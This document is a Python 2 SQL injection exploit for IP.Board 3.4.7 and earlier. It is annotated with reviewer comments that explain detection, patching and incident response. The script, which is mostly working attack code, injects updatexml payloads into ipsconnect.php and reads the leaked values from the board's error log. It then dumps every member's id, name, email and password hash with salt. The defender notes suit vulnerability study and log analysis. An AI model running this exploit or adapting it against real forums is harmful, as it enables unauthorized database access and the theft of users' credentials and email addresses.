- #!/usr/bin/env python
- # Rabu, Juni 03, 2014 - anon.grenxparta@gmail.com
- # IP.Board <= 3.4.7 SQLi (blind, error based);
- # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
- # Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs
# Review note: this is Python 2 code (print statements, raw_input, urllib2). In this
# paste every line carries a leading "- " marker and the original indentation is gone,
# so block structure has to be read from the syntax, not from columns.
# Per the header, the script reads data out of an IP.Board <= 3.4.7 database through an
# error-based blind SQL injection. Boards in that version range need the vendor's
# security update. The header also says the technique depends on
# 'cache/sql_error_latest.cgi' being readable, so that file should not be served over HTTP.
- print '\n\n---------------------------------------------------------------------------------'
- print 'Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
- print '---------Script has been modified for different table prefix XXX_members---------'
- print '---------------------------------------------------------------------------------\n\n\n'
# The base URL is typed in by the operator; only trailing slashes are stripped and
# nothing else about it is validated.
- url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ')
- url = url.rstrip('/')
# Fixed desktop-Chrome User-Agent that inject() sends with its requests. On its own it is a
# weak log indicator, because it is an ordinary browser string.
- ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
- import sys, re
- import urllib2, urllib
# inject(sql): evaluate one SQL expression on the target and return its value as text.
# Request 1 is a POST to <url>/interface/ipsconnect/ipsconnect.php with act=login,
# idType=id and two id[] values. The second id[] carries the URL-quoted payload, which
# wraps (sql) in updatexml(NULL, concat(0x3a, ...), NULL) so that the value ends up in
# the database's XPATH error text.
# Defender view: the injection point is the id[] array parameter of ipsconnect.php.
# The server-side fix is to treat those ids as integers or bind them as query
# parameters. In access logs, look for POSTs to this path answered with 503; the
# payload itself is only visible where request bodies are logged or inspected.
- def inject(sql):
- try:
- urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua}))
- except urllib2.HTTPError, e:
# A 503 reply is the only HTTP error the script treats as success; presumably it is what
# the board returns when the query fails with a database error.
- if e.code == 503:
# Request 2 fetches the board's SQL error log directly over HTTP. This is the actual data
# channel: if cache/sql_error_latest.cgi is not web-readable, nothing comes back this way.
- data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
# Extract the value from "XPATH syntax error: ':<value>'"; the leading ':' is the 0x3a
# that the payload prepends.
- txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
- if txt is not None:
- return txt.group(1)
# NOTE(review): with the indentation lost, the nesting of the three exits is ambiguous.
# Presumably Error [3] = 503 received but no XPATH text in the log, Error [1] = an
# HTTPError other than 503, Error [2] = the POST returned without raising. Confirm
# against an indented copy.
- sys.exit('Error [3], received unexpected data:\n%s' % data)
- sys.exit('Error [1]')
- sys.exit('Error [2]')
# get(name, table, num): read the column expression `name` from row `num` of `table`.
# It first asks inject() for LENGTH(...) of the value, then either reads the value in
# one call (length under 31) or joins it from SUBSTRING slices of 31 characters.
# NOTE(review): 31 is presumably the amount of text that survives in the XPATH error
# message after the ':' marker; this file does not establish that.
# `name` and `table` are %-formatted straight into the SQL text. In this script they
# come only from its own constants and from a table name returned by the target.
# Defender view: every value costs at least two inject() calls, and each call is a POST
# to ipsconnect.php followed by a GET of the error log. A dump therefore appears in logs
# as a dense, regular burst of those request pairs from one client.
- def get(name, table, num):
- sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
- s = int(inject('LENGTH((%s))' % sqli))
- if s < 31:
- return inject(sqli)
- else:
- r = ''
- for i in range(1, s+1, 31):
- r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
- return r
# Locate the members table. 0x6d656d6265727324 is the hex encoding of "members$", so
# the REGEXP selects the first table in the current schema whose name ends in "members"
# (the banner mentions differing prefixes, XXX_members).
# NOTE(review): the mixed-case "SeLecT" looks like an attempt to avoid case-sensitive
# keyword filters; detection rules should match SQL keywords case-insensitively.
- members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1')
# Row count of that table; it drives the loop below.
- n = inject('SELECT COUNT(*) FROM %s' % members_table)
- print '----------------------------------------------------------------------------'
- print '* Found %s users' % n
- print '----------------------------------------------------------------------------'
# For each row the script prints member_id, name, email and
# members_pass_hash:members_pass_salt.
# Defender view: if this traffic pattern is found in the logs, treat exactly these fields
# as disclosed. Reset member passwords, since hash and salt are read together, and
# expect the e-mail addresses to be reused for phishing.
- for j in range(int(n)):
- print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j))
- print '{:20s} {:20s}'.format('Name',get('name', members_table, j))
- print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
- print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j))
- print '----------------------------------------------------------------------------'